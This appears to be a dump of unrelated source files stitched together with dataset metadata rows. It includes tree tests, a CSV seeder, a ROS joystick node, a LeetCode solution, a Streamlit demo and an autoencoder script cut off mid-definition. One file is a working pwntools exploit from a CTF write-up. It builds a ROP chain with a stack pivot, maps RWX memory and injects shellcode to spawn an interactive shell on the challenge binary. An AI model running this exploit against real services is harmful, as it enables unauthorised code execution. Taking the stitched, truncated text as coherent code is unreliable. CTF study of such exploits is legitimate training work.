cha_cha = leftsided._size
for i in range(0, cha_cha):
x = lefty2[i]
leftsided.delete(x)
assert leftsided._size == leftsided.count() == 0
### TEST A LARGE TREE ###
rainforest = BinaryTree(500.5)
for i in range(0, 1000):
x = randint(0, 1000)
rainforest.set(x, "oxygen")
rainy = rainforest.make_key_list()
assert len(rainy) == rainforest._size
cha_cha = rainforest._size
for i in range(0, cha_cha):
x = rainy[i]
rainforest.delete(x)
assert rainforest._size == rainforest.count() == 0
def test_make_list():
willow = BinaryTree(50.5)
messy_tree = []
### willow, lopsided
for i in range(0, 50):
willow.set(i, "weeping")
messy_tree.append(i)
will_list = willow.make_key_list()
willow_size = willow.count()
assert len(will_list) == willow_size
for i in range(0, 50):
assert will_list[i] in messy_tree
## make_key_list() appends from root.left, then root.right, down the branches,
## so the two lists will have a different order: root.right will be second in the
## generated list, but most likely not second in the manually built list.
for i in range(0, 50):
assert messy_tree[i] in will_list
## silver_spruce more even
silver_spruce = BinaryTree(40.5)
decor = []
for i in range(0, 82):
silver_spruce.set(i, 'firewood')
decor.append(i)
pine = silver_spruce.make_key_list()
spruce_count = silver_spruce.count()
assert len(pine) == spruce_count
for i in range(0, 82):
assert decor[i] in pine
for i in range(0, 82):
assert pine[i] in decor
### random made even tree
apple = BinaryTree(30.5)
pie = []
for i in range(0, 40):
x = randint(0, 62)
apple.set(x, "buggy")
pie.append(x)
juice = apple.make_key_list()
apple_size = apple.count()
assert apple_size == len(juice)
for i in range(0, apple_size):
assert juice[i] in pie
assert pie[i] in juice
def test_get():
oaktree = BinaryTree(-511.5)
oaklist = []
oaktree.set(-211, "spam1")
oaklist.append(-211)
oaktree.set(-739, "spam2")
oaklist.append(-739)
oaktree.set(-279, "spam3")
oaklist.append(-279)
oaktree.set(-417, "spam4")
oaklist.append(-417)
oaktree.set(-419, "spam5")
oaklist.append(-419)
oaktree.set(-969, "spam6")
oaklist.append(-969)
oaktree.set(-14, "spam7")
oaklist.append(-14)
oaktree.set(-715, "spam8")
oaklist.append(-715)
oaktree.set(-351, "spam9")
oaklist.append(-351)
oaktree.set(-349, "spam10")
oaklist.append(-349)
oaktree.set(-893, "spam11")
oaklist.append(-893)
oaktree.set(-672, "spam12")
oaklist.append(-672)
oaktree.set(-455, "spam13")
oaklist.append(-455)
oaktree.set(-21, "spam14")
oaklist.append(-21)
oaktree.set(-463, "spam15")
oaklist.append(-463)
######################
oaktree.set(-321, "spam16")
oaklist.append(-321)
oaktree.set(-6, "spam17")
oaklist.append(-6)
oaktree.set(-741, "spam18")
oaklist.append(-741)
oaktree.set(-494, "spam19")
oaklist.append(-494)
oaktree.set(-595, "spam20")
oaklist.append(-595)
oaktree.set(-452, "spam21")
oaklist.append(-452)
oaktree.set(-36, "spam22")
oaklist.append(-36)
oaktree.set(-358, "spam23")
oaklist.append(-358)
oaktree.set(-796, "spam24")
oaklist.append(-796)
oaktree.set(-625, "spam25")
oaklist.append(-625)
oaktree.set(-61, "spam26")
oaklist.append(-61)
oaktree.set(-329, "spam27")
oaklist.append(-329)
############################
oaktree.set(-35, "spam28")
oaklist.append(-35)
oaktree.set(-106, "spam29")
oaklist.append(-106)
oaktree.set(-393, "spam30")
oaklist.append(-393)
oaktree.set(-57, "spam31")
oaklist.append(-57)
oaktree.set(-314, "spam32")
oaklist.append(-314)
oaktree.set(-51, "spam33")
oaklist.append(-51)
oaktree.set(-62, "spam34")
oaklist.append(-62)
oaktree.set(-689, "spam35")
oaklist.append(-689)
oaktree.set(-366, "spam36")
oaklist.append(-366)
oaktree.set(-344, "spam37")
oaklist.append(-344)
oaktree.set(-463, "spam38")
oaklist.append(-463)
oaktree.set(-663, "spam39")
oaklist.append(-663)
oaktree.set(-318, "spam40")
oaklist.append(-318)
assert oaktree.get(-318) == "spam40"
assert oaktree.get(100) is None
assert oaktree.get(-393) == "spam30"
assert oaktree.get(-969) == "spam6"
assert oaktree.get(-6) == "spam17"
assert oaktree.get(-211) == "spam1"
assert oaktree.get(-279) == "spam3"
assert oaktree.get(-969) == "spam6"
for akey in oaklist:
assert oaktree.get(akey) is not None
oaktree.delete(-211)
oaktree.delete(-739)
assert oaktree.get(-211) is None
assert oaktree.get(-739) is None
| 27.596296
| 80
| 0.68219
| 1,148
| 7,451
| 4.361498
| 0.212544
| 0.087877
| 0.034751
| 0.063711
| 0.196924
| 0.142201
| 0.12143
| 0.082485
| 0.069303
| 0.045936
| 0
| 0.087858
| 0.152194
| 7,451
| 269
| 81
| 27.698885
| 0.704765
| 0.086297
| 0
| 0.155738
| 0
| 0
| 0.067996
| 0
| 0
| 0
| 0
| 0
| 0.196721
| 1
| 0.020492
| false
| 0
| 0.008197
| 0
| 0.028689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee407797b83ac396b3980aeaad4d8b956d5e4e23
| 4,026
|
py
|
Python
|
writeups/2020/CyberStakes/party-roppin/solve.py
|
welchbj/ctf
|
fd4e2cea692b134163cc9bd66c2b4796bdefed8c
|
[
"MIT"
] | 65
|
2019-10-07T01:29:16.000Z
|
2022-03-18T14:20:40.000Z
|
writeups/2020/CyberStakes/party-roppin/solve.py
|
welchbj/ctf
|
fd4e2cea692b134163cc9bd66c2b4796bdefed8c
|
[
"MIT"
] | null | null | null |
writeups/2020/CyberStakes/party-roppin/solve.py
|
welchbj/ctf
|
fd4e2cea692b134163cc9bd66c2b4796bdefed8c
|
[
"MIT"
] | 12
|
2020-05-04T01:16:53.000Z
|
2022-01-02T14:33:41.000Z
|
#!/usr/bin/env python2
"""
Run exploit locally with:
./solve.py
./solve.py REMOTE HOST=challenge.acictf.com PORT=45110
"""
import ast
import struct
import subprocess
from pwn import *
PROG_PATH = './challenge'
PROT_RWX = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC
EGG_SIZE = 0x1000
def init_pwntools_context():
context.binary = PROG_PATH
context.terminal = ['tmux', 'vsplit', '-h']
context.log_level = 'debug'
def init_io():
if args['REMOTE']:
return remote(args['HOST'], int(args['PORT']))
else:
pty = process.PTY
return process(PROG_PATH, stdin=pty, stdout=pty, stderr=pty)
def check_out(io, shelf_idx, backpack_idx):
io.sendlineafter('\n\n', '2')
io.sendlineafter('book in?\n', str(shelf_idx))
io.sendlineafter('put the book?\n', str(backpack_idx))
def leave(io):
io.sendlineafter('\n\n', '9')
def fill_choice_buffer(io, data):
assert '\n' not in data
io.sendlineafter('\n\n', '1')
io.sendlineafter('\n\n', '0')
io.sendlineafter('Title?\n', data)
class Addrs:
CHOICE_BUF = 0x603100
MMAP = 0x4008e0
READ = 0x400930
def write_binary(io):
size = io.recvn(4)
size = struct.unpack('>I', size)[0]
log.info('Receiving ELF of size ' + str(size))
elf = io.recvn(size)
with open('challenge', 'w') as f:
f.write(elf)
def get_gadget(ropper_out, target, bad_str='0a'):
for line in ropper_out.splitlines():
line = line.strip()
if not line or not line.startswith('0x'):
continue
addr, instr = line.split(': ')
if bad_str in addr:
continue
if instr == target:
return ast.literal_eval(addr)
log.error('FAILED looking for: ' + target)
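# For reference, get_gadget() parses ropper's textual listing, one gadget per
# line in the form "<hex address>: <instructions>", e.g. (made-up address):
#   0x0000000000401c23: pop rdi; ret;
# Addresses whose hex contains bad_str (default '0a', a newline byte that
# sendline could not transmit) are skipped.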
def get_gadgets():
raw_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge', shell=True)
gadgets = {}
gadgets['POP_RDI'] = get_gadget(raw_gadgets, 'pop rdi; ret;')
gadgets['POP_RSI'] = get_gadget(raw_gadgets, 'pop rsi; ret;')
gadgets['POP_RDX'] = get_gadget(raw_gadgets, 'pop rdx; ret;')
gadgets['POP_R8_R9_RCX'] = get_gadget(raw_gadgets, 'pop r8; pop r9; pop rcx; ret;')
gadgets['POP_RAX_R9_RCX'] = get_gadget(raw_gadgets, 'pop rax; pop r9; pop rcx; ret;')
gadgets['POP_RSP'] = get_gadget(raw_gadgets, 'pop rsp; pop r13; pop r14; pop r15; ret;')
jmp_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge --jmp rax', shell=True)
gadgets['JMP_RAX'] = get_gadget(jmp_gadgets, 'jmp rax;')
return gadgets
def win(io):
if args['REMOTE']:
write_binary(io)
gadgets = get_gadgets()
# Account for the pops executed from the pivoted stack pointer.
rop = 'A' * 0x18
mmap_addr = 0x7fe7a1e8f000
# mmap
rop += p64(gadgets['POP_RDI'])
rop += p64(mmap_addr)
rop += p64(gadgets['POP_RSI'])
rop += p64(EGG_SIZE)
rop += p64(gadgets['POP_RDX'])
rop += p64(PROT_RWX)
rop += p64(gadgets['POP_R8_R9_RCX'])
rop += p64(0xffffffffffffffff) # 5th arg
rop += p64(0) # 6th arg
rop += p64(constants.MAP_PRIVATE | constants.MAP_FIXED | constants.MAP_ANON) # 4th arg
rop += p64(Addrs.MMAP)
# read
rop += p64(gadgets['POP_RDI'])
rop += p64(0)
rop += p64(gadgets['POP_RSI'])
rop += p64(mmap_addr)
rop += p64(gadgets['POP_RDX'])
rop += p64(EGG_SIZE)
rop += p64(Addrs.READ)
# redirect execution
rop += p64(gadgets['POP_RAX_R9_RCX'])
rop += p64(mmap_addr)
rop += p64(0)
rop += p64(0)
rop += p64(gadgets['JMP_RAX'])
fill_choice_buffer(io, rop)
# stack pivot
check_out(io, Addrs.CHOICE_BUF, -8)
check_out(io, 0, -7)
check_out(io, gadgets['POP_RSP'], -10)
# final payload
sc = asm(shellcraft.sh())
assert len(sc) <= EGG_SIZE
sc = sc + 'A' * (EGG_SIZE - len(sc))
io.send(sc)
io.interactive()
if __name__ == '__main__':
init_pwntools_context()
io = init_io()
if args['PAUSE']:
raw_input('PAUSED...')
win(io)
| 23.682353
| 102
| 0.619722
| 574
| 4,026
| 4.167247
| 0.318815
| 0.057692
| 0.048913
| 0.053512
| 0.240803
| 0.182692
| 0.157191
| 0.070234
| 0
| 0
| 0
| 0.039769
| 0.225534
| 4,026
| 169
| 103
| 23.822485
| 0.727389
| 0.059364
| 0
| 0.179245
| 0
| 0
| 0.148011
| 0
| 0
| 0
| 0.017507
| 0
| 0.018868
| 1
| 0.084906
| false
| 0
| 0.037736
| 0
| 0.198113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee42ab06df137bb5158c466e211b9c061a500ecf
| 1,485
|
py
|
Python
|
utils/mongo_seed/csv_to_json.py
|
Abdoul1996/superteam2
|
3ba558f9dfd652007a1f80ee01543c266c87bc0d
|
[
"MIT"
] | null | null | null |
utils/mongo_seed/csv_to_json.py
|
Abdoul1996/superteam2
|
3ba558f9dfd652007a1f80ee01543c266c87bc0d
|
[
"MIT"
] | null | null | null |
utils/mongo_seed/csv_to_json.py
|
Abdoul1996/superteam2
|
3ba558f9dfd652007a1f80ee01543c266c87bc0d
|
[
"MIT"
] | null | null | null |
from os import path
import csv
import json
import random
# Our dataset was created from http://www2.informatik.uni-freiburg.de/~cziegler/BX/ and reduced down to 1,000 records
# The CSV file has semicolon delimiters due to book titles containing commas
SCRIPT_DIR = path.dirname(path.realpath(__file__)) + '/'
DB_FILE = SCRIPT_DIR + 'cscl_db.csv'
OUTPUT_FILE = SCRIPT_DIR + 'cscl_db.json'
# Original headers: "ISBN";"Book-Title";"Book-Author";"Year-Of-Publication";"Publisher";"Image-URL-S";"Image-URL-M";"Image-URL-L"
with open(DB_FILE, 'r') as file:
reader = csv.DictReader(file,
delimiter=';',
fieldnames=[
'isbn', 'title', 'author', 'publication_year',
'publisher', 'image_url_s', 'image_url_m',
'image_url_l'
])
with open(OUTPUT_FILE, 'w') as o_file:
for line in reader:
copies = random.randrange(1,10)
available = random.randrange(0,copies)
line['copies'] = copies
line['available'] = available
# Convert publication_year from string to int
line['publication_year'] = int(line['publication_year'])
json.dump(line, o_file)
o_file.write('\n')
print(
'\n----------\nFinished converting {} from CSV to JSON.\nFile can be found at {}'
.format(DB_FILE, OUTPUT_FILE))
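# Example of one emitted JSON Lines record (illustrative field values):
#   {"isbn": "0195153448", "title": "Classical Mythology", "author": "Mark P. O. Morford",
#    "publication_year": 2002, "publisher": "Oxford University Press",
#    "image_url_s": "...", "image_url_m": "...", "image_url_l": "...",
#    "copies": 4, "available": 2}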
| 38.076923
| 129
| 0.576431
| 180
| 1,485
| 4.6
| 0.5
| 0.057971
| 0.031401
| 0.041063
| 0.152174
| 0.10628
| 0.10628
| 0.10628
| 0.10628
| 0.10628
| 0
| 0.008629
| 0.297643
| 1,485
| 38
| 130
| 39.078947
| 0.785235
| 0.243771
| 0
| 0
| 0
| 0
| 0.203936
| 0.019678
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.148148
| 0
| 0.148148
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee46f59058bfd66eb8f015628cb6a304ce257ecc
| 3,471
|
py
|
Python
|
scripts/kinova_joy_teleop.py
|
Gregory-Baker/kinova_joy_teleop
|
42666022662fdcf7985ca5d4598eecb5e18eb8b6
|
[
"MIT"
] | null | null | null |
scripts/kinova_joy_teleop.py
|
Gregory-Baker/kinova_joy_teleop
|
42666022662fdcf7985ca5d4598eecb5e18eb8b6
|
[
"MIT"
] | null | null | null |
scripts/kinova_joy_teleop.py
|
Gregory-Baker/kinova_joy_teleop
|
42666022662fdcf7985ca5d4598eecb5e18eb8b6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Node to convert joystick commands to kinova arm cartesian movements
"""
import rospy
from sensor_msgs.msg import Joy
#from geometry_msgs.msg import Pose
from kortex_driver.msg import TwistCommand, Finger, Empty, Pose
from kortex_driver.srv import SendGripperCommand, SendGripperCommandRequest, GetMeasuredCartesianPose, GetMeasuredCartesianPoseResponse
max_linear_speed = 0.1
max_angular_speed = 0.4
gripper_speed = 0.05
cartesian_min_limit_x = 0.3
restricted_mode = False
joy_topic = "joy"
arm_ns = ""
def joy_listener():
# start node
rospy.init_node("kinova_joy_teleop")
global restricted_mode
restricted_mode = rospy.get_param("~restricted_mode", False)
global arm_ns
arm_ns = rospy.get_param("~arm_ns", "")
global joy_topic
joy_topic = rospy.get_param("~joy_topic", "joy")
rospy.loginfo("restricted mode: " + str(restricted_mode))
# subscribe to joystick messages on topic "joy"
rospy.Subscriber(joy_topic, Joy, joy_cmd_callback, queue_size=1)
# keep node alive until stopped
rospy.spin()
def joy_cmd_callback(data):
# start publisher
pub = rospy.Publisher(arm_ns + "/in/cartesian_velocity", TwistCommand, queue_size=1)
# create gripper command message
cmd = TwistCommand()
if ((data.axes[5] < 0 or data.buttons[5] == 1) and data.buttons[4] != 1):
pose_srv = rospy.ServiceProxy(arm_ns + "/base/get_measured_cartesian_pose", GetMeasuredCartesianPose)
cmd.twist.linear_x = data.axes[1] * max_linear_speed
if (restricted_mode and data.axes[1] < 0):
try:
pose = GetMeasuredCartesianPoseResponse() # fallback default in case the service call fails
pose = pose_srv(Empty())
#rospy.loginfo("Kinova x position: %f")
except rospy.ServiceException as e:
rospy.loginfo("cartesian pose request failed")
if (pose.output.x < cartesian_min_limit_x):
cmd.twist.linear_x = 0
cmd.twist.linear_y = data.axes[0] * max_linear_speed
cmd.twist.linear_z = data.axes[4] * max_linear_speed
cmd.twist.angular_z = -data.axes[3] * max_angular_speed
rospy.loginfo("linear velocities: {%f, %f, %f};", cmd.twist.linear_x, cmd.twist.linear_y, cmd.twist.linear_z)
elif (not restricted_mode and data.axes[2] < 0):
cmd.twist.angular_x = data.axes[1] * max_angular_speed
cmd.twist.angular_y = -data.axes[0] * max_angular_speed
cmd.twist.angular_z = -data.axes[3] * max_angular_speed
rospy.loginfo("angular velocities: {%f, %f, %f};", cmd.twist.angular_x, cmd.twist.angular_y, cmd.twist.angular_z)
if (data.buttons[0] == 1 or data.buttons[1] == 1):
cmd_gripper_req = SendGripperCommandRequest()
cmd_gripper_req.input.mode = 2
fingey = Finger()
gripper_dir = -1 if data.buttons[0] == 1 else 1
fingey.value = gripper_dir*gripper_speed
cmd_gripper_req.input.gripper.finger.append(fingey)
try:
cmd_gripper_srv = rospy.ServiceProxy(arm_ns + "/base/send_gripper_command", SendGripperCommand)
cmd_gripper_srv(cmd_gripper_req)
except rospy.ServiceException as e:
rospy.loginfo(cmd_gripper_req)
rospy.loginfo("joystick gripper command failed")
# publish gripper command
pub.publish(cmd)
if __name__ == '__main__':
try:
joy_listener()
except rospy.ROSInterruptException:
pass
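# Example launch (assumed package/executable names; rospy private params are set
# with a leading underscore):
#   rosrun kinova_joy_teleop kinova_joy_teleop.py _restricted_mode:=true _joy_topic:=joy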
| 35.418367
| 135
| 0.675886
| 460
| 3,471
| 4.863043
| 0.26087
| 0.050067
| 0.043809
| 0.020116
| 0.219937
| 0.151095
| 0.088511
| 0.050961
| 0.050961
| 0.050961
| 0
| 0.014012
| 0.218669
| 3,471
| 97
| 136
| 35.783505
| 0.810841
| 0.091616
| 0
| 0.109375
| 0
| 0
| 0.091489
| 0.025821
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0.015625
| 0.0625
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee476c7b28e95c420c92669fa0909df9dee5dae3
| 576
|
py
|
Python
|
ausgesondert/dammitJim.py
|
Coding-for-the-Arts/drawbot-samples-solutions
|
7191610d6efd7d788056070e7826d255b7ef496b
|
[
"CC0-1.0"
] | null | null | null |
ausgesondert/dammitJim.py
|
Coding-for-the-Arts/drawbot-samples-solutions
|
7191610d6efd7d788056070e7826d255b7ef496b
|
[
"CC0-1.0"
] | null | null | null |
ausgesondert/dammitJim.py
|
Coding-for-the-Arts/drawbot-samples-solutions
|
7191610d6efd7d788056070e7826d255b7ef496b
|
[
"CC0-1.0"
] | null | null | null |
from random import choice # missing import: choice() is used below but never imported

kraftausdruecke = [
"Mist",
"Verdammt",
"Mannmannmann",
"Herrgottnochmal",
"Echt jetzt",
"Zum Teufel"
]
berufe = [
"Baggerführer",
"Velokurier",
"Tierärztin",
"Verkehrspolizist",
"Schreinerin",
"Apotheker",
"Komponist",
"Physikerin",
"Buchhändlerin"
]
a = choice(kraftausdruecke)
# pick random element in list
# find out its index
# pop it from the list, so it can’t be picked again
b = berufe.pop(berufe.index(choice(berufe)))
c = choice(berufe)
print(a, "Erwin" + ",", "ich bin", b, "und nicht", c + "!")
| 20.571429
| 59
| 0.604167
| 62
| 576
| 5.612903
| 0.774194
| 0.068966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.239583
| 576
| 27
| 60
| 21.333333
| 0.794521
| 0.166667
| 0
| 0
| 0
| 0
| 0.383158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4a673bdc3ecbf54bdd00a403e289703d72c886
| 2,429
|
py
|
Python
|
python/652_find_duplicated_subtrees.py
|
liaison/LeetCode
|
8b10a1f6bbeb3ebfda99248994f7c325140ee2fd
|
[
"MIT"
] | 17
|
2016-03-01T22:40:53.000Z
|
2021-04-19T02:15:03.000Z
|
python/652_find_duplicated_subtrees.py
|
liaison/LeetCode
|
8b10a1f6bbeb3ebfda99248994f7c325140ee2fd
|
[
"MIT"
] | null | null | null |
python/652_find_duplicated_subtrees.py
|
liaison/LeetCode
|
8b10a1f6bbeb3ebfda99248994f7c325140ee2fd
|
[
"MIT"
] | 3
|
2019-03-07T03:48:43.000Z
|
2020-04-05T01:11:36.000Z
|
from typing import List
from collections import defaultdict

# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
# set of all node strings
node_str_set = set()
duplicated_strs = set()
duplicated_nodes = list()
def node2str(node):
"""
this function accomplishes two tasks:
- index each node into a string
- search the duplicated nodes during the traversal
"""
nonlocal node_str_set
nonlocal duplicated_strs
nonlocal duplicated_nodes
if node is None:
return ""
left_str = node2str(node.left)
right_str = node2str(node.right)
node_str = str(node.val) + "(" + left_str + ")" + "(" + right_str + ")"
if node_str in node_str_set:
if node_str not in duplicated_strs:
duplicated_strs.add(node_str)
duplicated_nodes.append(node)
else:
node_str_set.add(node_str)
return node_str
node2str(root)
return duplicated_nodes
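# Illustrative serialization produced by node2str(): a node with value 2, a left
# leaf 4, and no right child becomes "2(4()())()". Identical subtrees always map
# to identical strings, which is what makes the set membership test work.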
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class SolutionCount:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
# node_str -> count
node_str_count = defaultdict(int)
duplicated_nodes = list()
def node2str(node):
"""
this function accomplishes two tasks:
- index each node into a string
- search the duplicated nodes during the traversal
"""
nonlocal node_str_count
nonlocal duplicated_nodes
if node is None:
return ""
node_str = "{}({})({})".format(
node.val, node2str(node.left), node2str(node.right))
node_str_count[node_str] += 1
if node_str_count[node_str] == 2:
duplicated_nodes.append(node)
return node_str
node2str(root)
return duplicated_nodes
| 26.402174
| 83
| 0.539728
| 258
| 2,429
| 4.883721
| 0.224806
| 0.105556
| 0.047619
| 0.038095
| 0.712698
| 0.634921
| 0.634921
| 0.552381
| 0.414286
| 0.414286
| 0
| 0.007952
| 0.378757
| 2,429
| 91
| 84
| 26.692308
| 0.827038
| 0.271717
| 0
| 0.5
| 0
| 0
| 0.008663
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4ac13afb88b80f6571f8b3cdd5af07771ebb6c
| 3,391
|
py
|
Python
|
main.py
|
rajanant49/Streamlit-Demo-App
|
894e0e2dbdf33148bccc6abc791221f6e7b01036
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
rajanant49/Streamlit-Demo-App
|
894e0e2dbdf33148bccc6abc791221f6e7b01036
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
rajanant49/Streamlit-Demo-App
|
894e0e2dbdf33148bccc6abc791221f6e7b01036
|
[
"Apache-2.0"
] | null | null | null |
import streamlit as st
from PIL import Image
import cv2
import numpy as np
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
st.title("Streamlit Demo App")
st.write("""
# Exploring different classifiers on different datasets
""")
dataset_name= st.selectbox("Select Dataset",("","IRIS","BreastCancer","WineDataset"))
if dataset_name!="":
classifier_name=st.selectbox("Select Classifier",("","KNN","RandomForest","SVM"))
if classifier_name!="":
def get_dataset(dataset_name):
if dataset_name=="IRIS":
data=datasets.load_iris()
elif dataset_name=="BreastCancer":
data=datasets.load_breast_cancer()
else:
data=datasets.load_wine()
X=data.data
y=data.target
return X,y
X,y=get_dataset(dataset_name)
st.write("Shape of the dataset",X.shape)
st.write("Number of classes",len(np.unique(y)))
def add_parameter_ui(clf_name):
params=dict()
if clf_name=="KNN":
K=st.slider("K",1,15)
params["K"]=K
elif clf_name=="SVM":
C=st.slider("C",0.01,10.0)
params['C']=C
else:
max_depth=st.slider("max_depth",2,15)
n_estimators=st.slider("n_estimators",1,100)
params["max_depth"]=max_depth
params["n_estimators"]=n_estimators
return params
params=add_parameter_ui(classifier_name)
def get_classifier(clf_name,params):
if clf_name=="KNN":
clf=KNeighborsClassifier(n_neighbors=params["K"])
elif clf_name=="SVM":
clf=SVC(C=params["C"])
else:
clf=RandomForestClassifier(n_estimators=params["n_estimators"],max_depth=params["max_depth"],random_state=42)
return clf
clf=get_classifier(classifier_name,params)
#Classification
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=42)
clf.fit(X_train,y_train)
y_pred=clf.predict(X_test)
acc=accuracy_score(y_pred,y_test)
st.write("Classifier = ",classifier_name)
st.write("Accuracy = ",np.round(acc*100,2),"%")
pca=PCA(2)
X_projected=pca.fit_transform(X)
x1=X_projected[:,0]
x2=X_projected[:,1]
fig=plt.figure()
plt.scatter(x1,x2,c=y,alpha=0.8,cmap='viridis')
plt.xlabel("Principal Component 1")
plt.ylabel("Principal Component 2")
plt.colorbar()
st.pyplot(fig)
# def load_image(image_file):
# img = Image.open(image_file)
# return img
#
# image_file = st.file_uploader("Upload Image",type=['png','jpeg','jpg'])
# if image_file is not None:
# file_details = {"Filename":image_file.name,"FileType":image_file.type,"FileSize":image_file.size}
# st.write(file_details)
#
# img = load_image(image_file)
# st.image(img,width=250,height=250)
# image_array=np.asarray(img)
# st.image(image_array,width=100,height=100)
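# To run the app locally (standard Streamlit workflow):
#   streamlit run main.py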
| 30.54955
| 125
| 0.6243
| 444
| 3,391
| 4.585586
| 0.306306
| 0.035363
| 0.023576
| 0.020629
| 0.014735
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019646
| 0.249484
| 3,391
| 110
| 126
| 30.827273
| 0.780354
| 0.136538
| 0
| 0.09589
| 0
| 0
| 0.123198
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041096
| false
| 0
| 0.164384
| 0
| 0.246575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4ba609d0784a1c68fa7c4cd767173c1520196d
| 3,485
|
py
|
Python
|
Face-Pixelizer/res/python/src/pixelize.py
|
spil3141/Pixelizer-Face
|
c234fe998727435d88f4b860432945c2e6a957ef
|
[
"MIT"
] | null | null | null |
Face-Pixelizer/res/python/src/pixelize.py
|
spil3141/Pixelizer-Face
|
c234fe998727435d88f4b860432945c2e6a957ef
|
[
"MIT"
] | null | null | null |
Face-Pixelizer/res/python/src/pixelize.py
|
spil3141/Pixelizer-Face
|
c234fe998727435d88f4b860432945c2e6a957ef
|
[
"MIT"
] | null | null | null |
"""
python3 detect.py \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
"""
import argparse
import os
import numpy as np
import tensorflow as tf
import PIL
import matplotlib.pyplot as plt
import matplotlib.image as matimage
class ConvolutionalAutoencoder(tf.keras.models.Model):
def __init__(self):
super(ConvolutionalAutoencoder,self).__init__()
self.encoder_input_shape = (128,128,3)
self.encoder = tf.keras.models.Sequential([
tf.keras.layers.Input(shape= self.encoder_input_shape),
tf.keras.layers.Conv2D(16, (3,3), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(8, (3,3), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(3, (3,3), activation='relu', padding='same'),
])
self.decoder = tf.keras.Sequential([
# Upsample its input
tf.keras.layers.UpSampling2D((2, 2)),
# tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='relu', padding='same'),
tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='sigmoid', padding='same')])
def call(self, x):
encoded = self.encoder(x)
decoded = self.decoder(encoded)
return decoded
def remove_alpha(img: np.ndarray) -> np.ndarray:
return np.array([img[0,:,:,:3]])
def display_sample(img: np.ndarray):
plt.imshow(img[0])
plt.show()
def Get_Img(path: str) -> np.ndarray:
img_2 = np.asarray(PIL.Image.open(path).resize((128,128)))
img_2 = np.array([img_2])
img_2 = img_2/255
print("shape: ", img_2.shape)
if img_2.shape[-1] >3:
img_2 = remove_alpha(img_2)
return img_2
def Save(imgarray: np.ndarray, path: str) -> None:
# method 1
matimage.imsave(os.path.join(path,"output.png"),imgarray)
#method 2 (not working)
# imgarray = imgarray * 255
# imgarray = imgarray.astype(int)
# imgarray = PIL.Image.fromarray(imgarray)
# imgarray.save(os.path.join(path,"output.png"))
def main():
